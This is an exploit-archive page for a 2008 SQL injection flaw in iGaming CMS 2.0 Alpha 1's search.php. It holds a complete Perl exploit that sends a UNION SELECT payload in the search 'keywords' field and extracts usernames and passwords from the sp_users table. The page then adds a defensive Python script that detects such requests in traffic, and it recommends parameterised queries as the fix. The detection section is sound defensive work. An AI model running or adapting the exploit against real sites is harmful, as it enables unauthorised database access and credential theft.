iGaming CMS 2.0 Alpha 1 (search.php) Remote SQL Injection Exploit

2008-10-20 / 2008-10-21
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl
# -----------------------------------------------------
# iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit
# By StAkeR aka athos - StAkeR[at]hotmail[dot]it
# On 16/10/2008
# http://www.igamingcms.com/iGaming_2_Alpha.zip
# -----------------------------------------------------
use strict;
use LWP::UserAgent;

my ($host,$id) = @ARGV;
usage() unless $host =~ /http:\/\/(.+?)$/ and $id =~ /^[0-9]/;

my $etc = "' union select 1,concat(0x616E6172636879,".
          "password,0x3a,username,0x616E6172636879),3".
          ",4,5 from sp_users where id=$id#";

my @search = ($etc,'all',0,'Search','search_games');
my @split  = undef;
my $http   = new LWP::UserAgent;

my $post = $http->post($host.'/search.php', [
    keywords => $search[0],
    platform => $search[1],
    exact    => $search[2],
    submit   => $search[3],
    do       => $search[4]
]);

if($post->is_success) {
    if($post->as_string =~ /anarchy(.+?)anarchy/) {
        @split = split(':',$1);
        print "Username: $split[0]\r\n";
        print "Password: $split[1]\r\n";
    } else {
        print "Exploit Failed!\r\n";
    }
}

sub usage {
    print "iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit\r\n";
    print "Usage: perl $0 http://[host] [user_id]\r\n";
    exit;
}
__END__
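The exploit above gives a defender a concrete signature: a single-quote-terminated UNION SELECT in the "keywords" field of a POST to search.php, MySQL hex literals (0x616E6172636879 decodes to the marker string "anarchy", 0x3a to ":"), and a trailing "#" that comments out the rest of the original query. The following detection script is an added example written for this page, not code from the advisory or from the exploit's author. It parses constructed sample request bodies (the field names are taken from the exploit; the request records themselves are made up), decodes the hex literals so an analyst sees the marker in clear, and raises an alert only when two or more independent indicators coincide, which keeps ordinary searches containing the word "union" from firing.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qs

# Constructed sample requests (method, path, URL-encoded POST body). The field
# names mirror the ones the advisory's exploit submits; the second record carries
# the advisory's payload shape with the user id replaced by a fixed sample value.
SAMPLE_REQUESTS = [
    ("POST", "/search.php",
     "keywords=mario+kart&platform=all&exact=0&submit=Search&do=search_games"),
    ("POST", "/search.php",
     "keywords=%27+union+select+1%2Cconcat%280x616E6172636879%2Cpassword%2C0x3a"
     "%2Cusername%2C0x616E6172636879%29%2C3%2C4%2C5+from+sp_users+where+id%3D1%23"
     "&platform=all&exact=0&submit=Search&do=search_games"),
    ("GET", "/index.php", ""),
]

# Indicators drawn from the advisory's payload: a UNION SELECT following a quote,
# MySQL 0x... string literals (used to smuggle the marker and the ':' separator),
# and a comment token at the end that truncates the rest of the original query.
UNION_RE = re.compile(r"(?i)(?:'|%27)\s*union\s+(?:all\s+)?select\b")
HEX_LITERAL_RE = re.compile(r"0x([0-9a-fA-F]{2,})")
COMMENT_TERMINATOR_RE = re.compile(r"(?:#|--\s|/\*)\s*$")


def decode_hex_literals(value: str) -> list[str]:
    """Return the ASCII text hidden in 0x... literals (0x616E6172636879 -> 'anarchy')."""
    out = []
    for hexdigits in HEX_LITERAL_RE.findall(value):
        if len(hexdigits) % 2:          # odd length cannot be a byte string
            continue
        try:
            out.append(bytes.fromhex(hexdigits).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue                    # not printable text, ignore
    return out


def classify_request(method: str, path: str, body: str) -> dict:
    """Inspect one request and return the indicators seen on the keywords field."""
    findings = {"path": path, "indicators": [], "decoded_literals": []}
    if method != "POST" or not path.endswith("/search.php"):
        return findings
    form = parse_qs(body, keep_blank_values=True)   # percent-decodes the body
    keywords = form.get("keywords", [""])[0]
    if UNION_RE.search(keywords):
        findings["indicators"].append("union_select")
    if COMMENT_TERMINATOR_RE.search(keywords.strip()):
        findings["indicators"].append("comment_terminator")
    decoded = decode_hex_literals(keywords)
    if decoded:
        findings["indicators"].append("hex_literals")
        findings["decoded_literals"] = decoded
    return findings


def is_sqli_attempt(findings: dict) -> bool:
    """Alert when at least two independent indicators coincide on one request."""
    return len(findings["indicators"]) >= 2


def scan(requests=SAMPLE_REQUESTS) -> list[dict]:
    """Return the findings for every request that looks like an injection attempt."""
    return [f for f in (classify_request(*r) for r in requests) if is_sqli_attempt(f)]


if __name__ == "__main__":
    for hit in scan():
        print(hit)
```

Run against the samples, only the second record is reported, with the decoded literals showing the "anarchy" marker and ":" separator; the same three checks can be applied to an access-log extract or a WAF's request capture by feeding (method, path, body) triples into scan(). The real fix on the application side is to bind the search term as a parameter instead of concatenating it into the query; the detector above is for finding attempts in traffic while that fix is rolled out.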

References:

http://www.securityfocus.com/bid/31793
http://www.milw0rm.com/exploits/6769



Copyright 2024, cxsecurity.com
